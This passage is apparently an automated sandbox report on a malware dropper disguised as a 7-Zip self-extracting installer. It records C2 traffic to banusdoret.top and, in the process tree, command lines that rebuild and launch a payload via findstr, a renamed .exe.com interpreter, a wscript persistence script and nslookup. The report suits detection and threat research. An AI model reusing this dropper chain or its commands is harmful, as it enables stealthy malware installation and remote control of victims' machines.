.text	0x1000	0x1bd4a	0x1be00	False	0.602858744395	data	6.71052533174	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1d000	0x41a8	0x4200	False	0.46123342803	data	5.74601891947	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x22000	0x4c90	0x800	False	0.41357421875	data	3.69619341546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x27000	0xa3c5	0xa400	False	0.442644817073	data	6.27811106965	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x27160	0x36ba	PNG image data, 228 x 228, 8-bit/color RGBA, non-interlaced
RT_ICON	0x2a81c	0x6529	data
RT_GROUP_ICON	0x30d48	0x22	data
RT_VERSION	0x30d6c	0x350	data
RT_MANIFEST	0x310bc	0x309	ASCII text

Imports

DLL	Import
COMCTL32.dll
SHELL32.dll	ShellExecuteExW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHGetSpecialFolderPathW
GDI32.dll	CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll	FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll	GetParent, ScreenToClient, CreateWindowExW, GetDesktopWindow, GetWindowTextLengthW, SetWindowPos, SetTimer, GetMessageW, CopyImage, KillTimer, CharUpperW, SendMessageW, ShowWindow, BringWindowToTop, wsprintfW, MessageBoxW, EndDialog, ReleaseDC, GetWindowDC, GetMenu, GetWindowLongW, GetClassNameA, wsprintfA, DispatchMessageW, SetWindowTextW, GetSysColor, DestroyWindow, MessageBoxA, GetKeyState, IsWindow, GetDlgItem, GetClientRect, GetSystemMetrics, SetWindowLongW, UnhookWindowsHookEx, SetFocus, SystemParametersInfoW, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, GetWindowTextW, GetWindowRect
ole32.dll	CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll	SysAllocStringLen, VariantClear, SysFreeString, OleLoadPicture, SysAllocString
KERNEL32.dll	SetFileTime, SetEndOfFile, GetFileInformationByHandle, VirtualFree, GetModuleHandleA, WaitForMultipleObjects, VirtualAlloc, ReadFile, SetFilePointer, GetFileSize, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetEnvironmentVariableW, GetDriveTypeW, CreateFileW, LoadLibraryA, SetThreadLocale, GetSystemTimeAsFileTime, ExpandEnvironmentStringsW, CompareFileTime, WideCharToMultiByte, GetTempPathW, GetCurrentDirectoryW, GetEnvironmentVariableW, lstrcmpiW, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, GetModuleHandleW, FindFirstFileW, lstrcmpW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, GetStdHandle, WriteFile, lstrlenA, CreateDirectoryW, GetFileAttributesW, SetCurrentDirectoryW, GetLocalTime, SystemTimeToFileTime, CreateThread, GetExitCodeThread, Sleep, SetFileAttributesW, GetDiskFreeSpaceExW, SetLastError, GetTickCount, lstrlenW, ExitProcess, lstrcatW, GetProcAddress, CloseHandle, WaitForSingleObject, GetExitCodeProcess, GetQueuedCompletionStatus, ResumeThread, SetInformationJobObject, CreateIoCompletionPort, AssignProcessToJobObject, CreateJobObjectW, GetLastError, CreateProcessW, GetStartupInfoW, GetCommandLineW, GetStartupInfoA
MSVCRT.dll	_purecall, ??2@YAPAXI@Z, _wtol, memset, memmove, memcpy, _wcsnicmp, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, malloc, realloc, free, wcsstr, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, strncmp, wcsncmp, wcsncpy, strncpy, ??3@YAXPAX@Z

Version Infos

Description	Data
LegalCopyright	Copyright 2005-2016 Oleg N. Scherbakov
InternalName	7ZSfxMod
FileVersion	1.7.0.3900
CompanyName	Oleg N. Scherbakov
PrivateBuild	April 1, 2016
ProductName	7-Zip SFX
ProductVersion	1.7.0.3900
FileDescription	7z Setup SFX (x86)
OriginalFilename	7ZSfxMod_x86.exe
Translation	0x0000 0x04b0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 10:51:48.211783886 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:48.248919964 CEST	443	49730	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:48.249011040 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:48.297076941 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:48.334189892 CEST	443	49730	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:48.335027933 CEST	443	49730	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:48.335057974 CEST	443	49730	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:48.335076094 CEST	443	49730	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:48.335144997 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:48.335174084 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:48.401423931 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:48.439044952 CEST	443	49730	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:48.439230919 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:48.458048105 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:48.537000895 CEST	443	49730	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:51.044800043 CEST	443	49730	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:51.044917107 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:51.101850033 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:51.138989925 CEST	443	49730	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:51.139132977 CEST	49730	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.261534929 CEST	49736	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.298271894 CEST	443	49736	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.298368931 CEST	49736	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.299004078 CEST	49736	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.335913897 CEST	443	49736	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.336038113 CEST	443	49736	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.336169958 CEST	49736	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.336937904 CEST	49736	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.340210915 CEST	49736	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.340400934 CEST	49736	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.377252102 CEST	443	49736	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.377367020 CEST	443	49736	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.447762012 CEST	443	49736	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.448004961 CEST	49736	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.484589100 CEST	49736	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.487601995 CEST	49737	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.521543980 CEST	443	49736	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.521784067 CEST	49736	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.524744034 CEST	443	49737	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.524957895 CEST	49737	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.525288105 CEST	49737	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.562771082 CEST	443	49737	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.562814951 CEST	443	49737	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.563021898 CEST	49737	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.563952923 CEST	49737	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.566720009 CEST	49737	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.603965044 CEST	443	49737	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.670713902 CEST	443	49737	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.670866966 CEST	49737	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.723289013 CEST	49737	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.760421038 CEST	443	49737	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.760620117 CEST	49737	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.834237099 CEST	49738	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.871321917 CEST	443	49738	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.871542931 CEST	49738	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.871781111 CEST	49738	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.908390045 CEST	443	49738	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.908427954 CEST	443	49738	8.208.95.18	192.168.2.6
Apr 8, 2021 10:51:59.908519983 CEST	49738	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.909439087 CEST	49738	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.914376974 CEST	49738	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:51:59.951232910 CEST	443	49738	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.016449928 CEST	443	49738	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.017641068 CEST	49738	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.074441910 CEST	49738	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.111310005 CEST	443	49738	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.111473083 CEST	49738	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.191163063 CEST	49739	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.228209019 CEST	443	49739	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.229124069 CEST	49739	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.229389906 CEST	49739	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.266302109 CEST	443	49739	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.266318083 CEST	443	49739	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.266870975 CEST	49739	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.267250061 CEST	49739	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.270010948 CEST	49739	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.306919098 CEST	443	49739	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.373229980 CEST	443	49739	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.373536110 CEST	49739	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.398222923 CEST	49739	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.435311079 CEST	443	49739	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.436233044 CEST	49739	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.503431082 CEST	49740	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.540998936 CEST	443	49740	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.544018984 CEST	49740	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.544552088 CEST	49740	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.582031012 CEST	443	49740	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.582063913 CEST	443	49740	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.582192898 CEST	49740	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.582699060 CEST	49740	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.585120916 CEST	49740	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.622780085 CEST	443	49740	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.686142921 CEST	443	49740	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.689125061 CEST	49740	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.738214970 CEST	49740	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.776184082 CEST	443	49740	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.776597977 CEST	49740	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.847709894 CEST	49741	443	192.168.2.6	8.208.95.18
Apr 8, 2021 10:52:00.885088921 CEST	443	49741	8.208.95.18	192.168.2.6
Apr 8, 2021 10:52:00.885189056 CEST	49741	443	192.168.2.6	8.208.95.18

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 10:50:12.925071001 CEST	64267	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:12.937567949 CEST	53	64267	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:14.182961941 CEST	49448	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:14.195956945 CEST	53	49448	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:15.112163067 CEST	60342	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:15.124771118 CEST	53	60342	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:20.564079046 CEST	61346	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:20.576509953 CEST	53	61346	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:30.808983088 CEST	51774	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:30.821641922 CEST	53	51774	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:31.685741901 CEST	56023	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:31.698636055 CEST	53	56023	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:39.998100042 CEST	58384	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:40.011301994 CEST	53	58384	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:42.811518908 CEST	60261	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:42.823417902 CEST	53	60261	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:44.874286890 CEST	56061	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:44.887089968 CEST	53	56061	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:46.472759962 CEST	58336	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:46.486099958 CEST	53	58336	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:47.450792074 CEST	53781	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:47.463474035 CEST	53	53781	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:48.312582970 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:48.326539040 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:48.603174925 CEST	52811	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:48.617897987 CEST	53	52811	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:51.302234888 CEST	55299	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:51.314358950 CEST	53	55299	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:52.029544115 CEST	63745	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:52.042207956 CEST	53	63745	8.8.8.8	192.168.2.6
Apr 8, 2021 10:50:52.439315081 CEST	50055	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:50:52.453015089 CEST	53	50055	8.8.8.8	192.168.2.6
Apr 8, 2021 10:51:03.801086903 CEST	61374	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:51:03.813566923 CEST	53	61374	8.8.8.8	192.168.2.6
Apr 8, 2021 10:51:29.412709951 CEST	50339	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:51:29.425477028 CEST	53	50339	8.8.8.8	192.168.2.6
Apr 8, 2021 10:51:30.261276007 CEST	63307	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:51:30.273669004 CEST	53	63307	8.8.8.8	192.168.2.6
Apr 8, 2021 10:51:30.883323908 CEST	49694	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:51:30.901643038 CEST	53	49694	8.8.8.8	192.168.2.6
Apr 8, 2021 10:51:39.885373116 CEST	54982	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:51:39.900033951 CEST	53	54982	8.8.8.8	192.168.2.6
Apr 8, 2021 10:51:45.649997950 CEST	50010	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:51:45.667886972 CEST	53	50010	8.8.8.8	192.168.2.6
Apr 8, 2021 10:51:48.161295891 CEST	63718	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:51:48.174905062 CEST	53	63718	8.8.8.8	192.168.2.6
Apr 8, 2021 10:51:52.257822037 CEST	62116	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:51:52.269671917 CEST	53	62116	8.8.8.8	192.168.2.6
Apr 8, 2021 10:51:53.155883074 CEST	63816	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:51:53.169202089 CEST	53	63816	8.8.8.8	192.168.2.6
Apr 8, 2021 10:51:54.576421976 CEST	55014	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:51:54.623588085 CEST	53	55014	8.8.8.8	192.168.2.6
Apr 8, 2021 10:52:16.008687019 CEST	62208	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:52:16.021300077 CEST	53	62208	8.8.8.8	192.168.2.6
Apr 8, 2021 10:52:26.028850079 CEST	57574	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:52:26.061989069 CEST	53	57574	8.8.8.8	192.168.2.6
Apr 8, 2021 10:52:27.082496881 CEST	51818	53	192.168.2.6	8.8.8.8
Apr 8, 2021 10:52:27.103729010 CEST	53	51818	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 8, 2021 10:50:39.998100042 CEST	192.168.2.6	8.8.8.8	0x880c	Standard query (0)	zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyR	A (IP address)	IN (0x0001)
Apr 8, 2021 10:50:52.439315081 CEST	192.168.2.6	8.8.8.8	0xf091	Standard query (0)	zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyR	A (IP address)	IN (0x0001)
Apr 8, 2021 10:51:48.161295891 CEST	192.168.2.6	8.8.8.8	0x1688	Standard query (0)	banusdoret.top	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 8, 2021 10:50:40.011301994 CEST	8.8.8.8	192.168.2.6	0x880c	Name error (3)	zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyR	none	none	A (IP address)	IN (0x0001)
Apr 8, 2021 10:50:52.453015089 CEST	8.8.8.8	192.168.2.6	0xf091	Name error (3)	zjZFqZYoOtpryMyR.zjZFqZYoOtpryMyR	none	none	A (IP address)	IN (0x0001)
Apr 8, 2021 10:51:48.174905062 CEST	8.8.8.8	192.168.2.6	0x1688	No error (0)	banusdoret.top		8.208.95.18	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 8, 2021 10:51:48.335057974 CEST	8.208.95.18	443	192.168.2.6	49730	CN=vikertonara.top CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Fri Feb 26 18:10:55 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Thu May 27 19:10:55 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Apr 8, 2021 10:51:48.335057974 CEST	8.208.95.18	443	192.168.2.6	49730	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WDnE51mua6.exe PID: 3000 Parent PID: 5944

General

Start time:	10:50:21
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\WDnE51mua6.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\WDnE51mua6.exe'
Imagebase:	0x400000
File size:	1338284 bytes
MD5 hash:	7E7012645CC3D6D3572BB01891FBCEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: svchost.exe PID: 5744 Parent PID: 3000

General

Start time:	10:50:23
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\svchost.exe'
Imagebase:	0xf60000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 3908 Parent PID: 3000

General

Start time:	10:50:25
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c CmD < Poi.vsd
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 724 Parent PID: 3908

General

Start time:	10:50:27
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 5720 Parent PID: 3908

General

Start time:	10:50:30
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	CmD
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: findstr.exe PID: 4808 Parent PID: 5720

General

Start time:	10:50:35
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V /R '^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$' Che.vsd
Imagebase:	0xe00000
File size:	29696 bytes
MD5 hash:	8B534A7FC0630DE41BB1F98C882C19EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: Gia.exe.com PID: 2904 Parent PID: 5720

General

Start time:	10:50:36
Start date:	08/04/2021
Path:	C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
Wow64 process (32bit):	true
Commandline:	Gia.exe.com D
Imagebase:	0x7ff6c59a0000
File size:	943784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: Gia.exe.com PID: 5596 Parent PID: 2904

General

Start time:	10:50:37
Start date:	08/04/2021
Path:	C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\QhXpJEISYfDvrPPKg\Gia.exe.com D
Imagebase:	0x8b0000
File size:	943784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: PING.EXE PID: 5044 Parent PID: 5720

General

Start time:	10:50:38
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 30
Imagebase:	0x230000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: wscript.exe PID: 5868 Parent PID: 3440

General

Start time:	10:50:49
Start date:	08/04/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\zPgFqFUsML\wAYZqHgYEOdcYU.js'
Imagebase:	0x7ff7e13f0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: juROhmfLml.exe.com PID: 6204 Parent PID: 4920

General

Start time:	10:50:51
Start date:	08/04/2021
Path:	C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\zPgFqFUsML\juROhmfLml.exe.com C:\Users\user\AppData\Roaming\zPgFqFUsML\I
Imagebase:	0x220000
File size:	943784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 2%, ReversingLabs
Reputation:	moderate

Analysis Process: nslookup.exe PID: 6348 Parent PID: 5596

General

Start time:	10:51:03
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):
Commandline:	C:\Windows\SysWOW64\nslookup.exe
Imagebase:
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: nslookup.exe PID: 6552 Parent PID: 6204

General

Start time:	10:51:18
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\nslookup.exe
Imagebase:	0x3f0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 5192 Parent PID: 6552

General

Start time:	10:51:51
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C ver > 'C:\Users\user\AppData\Local\Temp\chrCF8.tmp'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6048 Parent PID: 5192

General

Start time:	10:51:51
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 6308 Parent PID: 6552

General

Start time:	10:51:52
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
